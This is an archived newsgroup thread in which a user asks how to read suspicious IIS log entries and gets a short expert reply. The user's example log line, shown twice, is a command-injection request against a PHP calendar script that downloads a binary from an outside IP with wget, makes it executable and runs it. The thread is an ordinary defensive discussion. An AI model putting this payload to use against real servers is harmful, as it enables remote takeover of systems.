|
security
newsgroups
|
|||||||||||||||||||||||
|
|||||||||||||||||||||||
Understanding W3SVC1 logsCould anyone point me in the direction of a knowledge base or good book that
will help in understanding suspicious looking entries in the logs? I use iis 5, fully patched, anti-virus installed, updated daily and scanned daily. For example, GET /webcalendar/tools/send_reminders.php cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo Thanks! The request looks like a command sequence against a *nix server that has no
meaning on IIS/Windows. -- Show quoteHide quote//David IIS http://blogs.msdn.com/David.Wang This posting is provided "AS IS" with no warranties, and confers no rights. // "Vic" <V**@discussions.microsoft.com> wrote in message news:417F6FE7-3CCF-4358-AF6E-C9D2C16C8E95@microsoft.com... > Could anyone point me in the direction of a knowledge base or good book > that > will help in understanding suspicious looking entries in the logs? I use > iis > 5, fully patched, anti-virus installed, updated daily and scanned daily. > > For example, GET /webcalendar/tools/send_reminders.php > > cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo > > Thanks! > 
Other interesting topics
Problems with IIS6 / SSL
Locking down FPSE Moved to new server, I_USR not showing Intermittent login issue Getting Server SSL Cert Expiration Info IISADMPWD Vulerabilities Cross Site Scripting - Newbie Question IIS Manager on remote computer Making ASPNET a Member of Administrator Group?? Local Server Logon Required? |
|||||||||||||||||||||||
